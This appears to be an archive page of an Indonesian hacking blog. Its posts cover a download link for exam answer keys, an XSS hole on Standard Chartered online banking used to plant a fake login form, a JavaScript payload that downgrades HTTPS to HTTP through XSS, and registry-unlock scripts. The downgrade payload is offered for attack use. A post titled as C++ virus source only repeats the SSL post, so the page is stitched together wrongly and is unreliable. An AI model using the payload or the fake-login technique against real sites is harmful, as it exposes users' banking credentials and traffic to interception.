Social Icons

Saturday, January 30, 2016

Kunci Detik-detik SMP 2015 Matematika

Buku Detik-Detik Ujian Nasional sudah terkenal akurat dalam memprediksi bagaimana bentuk soal UN yang sebenarnya. Ini bisa dibuktikan dari beberapa soal yang terdapat dalam paket soal Tryout maupun Prediksi UN keluar dalam UN yang sebenarnya.

Oleh karena itu, buku ini sudah dipercaya oleh banyak kalangan baik guru maupun siswa. Begitu buku ini datang di sebuah toko buku, seketika itu pula buku ini ludes terjual. Saking laris manisnya sampai sebuah toko buku menyediakan tempat yang cukup luas untuk menumpuk buku Detik-detik ini.


berikut ini saya memberikan link untuk mendownlod Kunci Jawaban dan Pembahasan Detik-detik UN SMP tahun 2015 karangan penerbit Intan Pariwara untuk pelajaran Matematika :

Kunci Detik-detik SMP 2015 Matematika

Mudah-mudahan bermanfaat.

Monday, January 4, 2016

Menanam Form Login Palsu Pada Web Standard Chartered Online Banking

Lagi-lagi Bank Standard Chartered memiliki celah XSS yang cukup serius. Celah ini memungkinkan phisher untuk membuat form login palsu pada area Online Banking. Sama dengan celah-celah XSS pada umumnya, tidak ada kerusakan yang akan ditimbulkan pada sisi Standard Chartered. Hanya saja, apabila celah ini dibiarkan, tinggal menunggu waktu ada orang jahat yang memanfaatkan celah ini untuk melakukan aksi penipuan dengan berbekal penyingkat URL, jejaring sosial, email, atau instant messenger.

Contoh Hasil Form Login Palsu

{image: Standard Chatered Online Banking XSSED by SPYRO KiD}
Standard Chatered Online Banking XSSED by SPYRO KiD

POC


//E.O.F

Sunday, January 3, 2016

Protocol Redirect: Playing With Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) merupakan salah satu metode enkripsi yang telah banyak dipercaya sebagai solusi keamanan komunikasi. Paket data yang mengunakan SSL akan dienkripsi sehingga walaupun nantinya tertangkap oleh Network Sniffer, maka orang lain akan sulit untuk membaca informasi sensitif didalamnya.
Dalam berselancar, biasanya kita menggunakan protokol http:// Namun apabila komunikasi yang terjalin menggunakan SSL, protokol yang digunakan adalah https://. Biasanya ada peringatan dari browser apabila kita akan menggunakan SSL dalam berkomunikasi.
Mari kita lihat dengan menggunakan WIRESHARK mengapa dalam komunikasi sensitif banyak orang mengklaim bahwa SSL adalah pilihan tepat dan cukup secure untuk menjaga informasi sensitif yang sedang terjalin:
{image: wireshark}
Wireshark
Saya melakukan scanning, kemudian mengakses http://spyrozone.net, Berikut yang saya dapatkan dari “Follow TCP Stream” :
{image: spyrozone.net melalui protokol http}
spyrozone.net melalui protokol http
Hmm.. sniffable.. ^_^ Halaman yang saya akses bisa disusun ulang dengan mudahnya. Namun ketika saya mengakses https://spyrozone.net
{image: spyrozone.net melalui protokol https}
spyrozone.net melalui protokol https
Hmm.. sudah jelas khan kenapa dikatakan Secure ^_* Informasi yang ditangkap sulit untuk dibaca ^_^
Namun.. hanya dengan beberapa potong code JavaScript, anda dapat membuat SSL tidak berguna pada situs yang vuln terhadap Cross Site Scripting (XSS). Anda dapat melakukan redirect protokol untuk melempar user dari jalur SSL ke jalur normal dengan menginjeksikan script sederhana pada situs yang vuln terhadap XSS tersebut.. ^_^
And.. Here is the code:
Object.prototype.protocol_redirect = function(uri) {
    if(uri) {
        if(uri.indexOf('https:') !=-1) {
            u = uri;
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    } else {
        u = document.location.href;
        if(document.location.protocol == 'https:') {
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    }
};
this.protocol_redirect();
Hmm.. saya rasa ini juga merupakan salah satu alasan yang kuat kenapa begitu banyak Attacker selalu mengatakan bahwa XSS cukup mengerikan di tangan yang tepat, dan mengapa mereka selalu tertawa ketika masih ada orang yang meremehkan XSS ^_^
Keep learning and Happy hacking.. ^_*

//E.O.F

Angel Virus Source Code With C++


Secure Sockets Layer (SSL) merupakan salah satu metode enkripsi yang telah banyak dipercaya sebagai solusi keamanan komunikasi. Paket data yang mengunakan SSL akan dienkripsi sehingga walaupun nantinya tertangkap oleh Network Sniffer, maka orang lain akan sulit untuk membaca informasi sensitif didalamnya.
Dalam berselancar, biasanya kita menggunakan protokol http:// Namun apabila komunikasi yang terjalin menggunakan SSL, protokol yang digunakan adalah https://. Biasanya ada peringatan dari browser apabila kita akan menggunakan SSL dalam berkomunikasi.
Mari kita lihat dengan menggunakan WIRESHARK mengapa dalam komunikasi sensitif banyak orang mengklaim bahwa SSL adalah pilihan tepat dan cukup secure untuk menjaga informasi sensitif yang sedang terjalin:
{image: wireshark}
Wireshark
Saya melakukan scanning, kemudian mengakses http://spyrozone.net, Berikut yang saya dapatkan dari “Follow TCP Stream” :
{image: spyrozone.net melalui protokol http}
spyrozone.net melalui protokol http
Hmm.. sniffable.. ^_^ Halaman yang saya akses bisa disusun ulang dengan mudahnya. Namun ketika saya mengakses https://spyrozone.net
{image: spyrozone.net melalui protokol https}
spyrozone.net melalui protokol https
Hmm.. sudah jelas khan kenapa dikatakan Secure ^_* Informasi yang ditangkap sulit untuk dibaca ^_^
Namun.. hanya dengan beberapa potong code JavaScript, anda dapat membuat SSL tidak berguna pada situs yang vuln terhadap Cross Site Scripting (XSS). Anda dapat melakukan redirect protokol untuk melempar user dari jalur SSL ke jalur normal dengan menginjeksikan script sederhana pada situs yang vuln terhadap XSS tersebut.. ^_^
And.. Here is the code:
Object.prototype.protocol_redirect = function(uri) {
    if(uri) {
        if(uri.indexOf('https:') !=-1) {
            u = uri;
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    } else {
        u = document.location.href;
        if(document.location.protocol == 'https:') {
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    }
};
this.protocol_redirect();
Hmm.. saya rasa ini juga merupakan salah satu alasan yang kuat kenapa begitu banyak Attacker selalu mengatakan bahwa XSS cukup mengerikan di tangan yang tepat, dan mengapa mereka selalu tertawa ketika masih ada orang yang meremehkan XSS ^_^
Keep learning and Happy hacking.. ^_*

//E.O.F

Unlock Registry yang Terkunci

Akhir-akhir ini worm semakin merajalela. Dan sebagian besar dari worm-worm tersebut menggunakan “aksi klasik” dengan mendisable Registry editor untuk memproteksi dirinya-sendiri. Hehehe… Ga’ salah sich.. pasalnya Registry editor adalah bagian terpenting yang kita butuhkan untuk melakukan manipulasi pada komputer kita. Dalam pembasmian worm-pun kita butuh masuk ke registry editor kecuali kita hafal lokasi-lokasi key yang diserang – dalam hal ini kita bisa pakai script VB atau  membuat file *.reg

Cara Pertama

Adakalanya untuk men-unlock registry yang terkunci, kita membuat file *.reg dengan script berikut:
1REGEDIT4
2[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
3"DisableRegistryTools"=dword:00000000
Simpan dengan nama terserah.reg dan jalankan.. maka registry editor anda akan ter un-lock. Namun pada beberapa kasus, regsitry editor tetap terkunci. Ada beberapa kemungkinan:
  • Ada file *.reg lain yang berisi file script serupa di direktory lain, dan dalam script “lain” tersebut value DisableRegistryTools = 1 Hal ini kerap kali terjadi pada WIN-ME
  • Ada aplikasi lain yang sedang memproteksi komputer yang sedang anda hadapi yang mendisable penggunaan file-file dengan ekstensi *.reg —> kerap kali dijumpai di warnet-warnet.
Jika memang demikian, ada alternatif lain yang bisa anda lakukan. Coba script berikut:

Cara Kedua

01[Version]
02Signature="$Chicago$"
03Provider=Symantec
04 
05[DefaultInstall]
06AddReg=UnhookRegKey
07 
08[UnhookRegKey]
09HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
10HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
11HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
12HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
13HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
14HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
15HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,0x00000020,0
Simpan dengan nama terserah anda.inf Setelah terbentuk file *.inf, klik kanan pada file tersebut dan pilih [instal]. Sekarang coba buka registry anda dan tara… regedit yang manis pun terbuka dengan sepenuh hati. :)

//E.O.F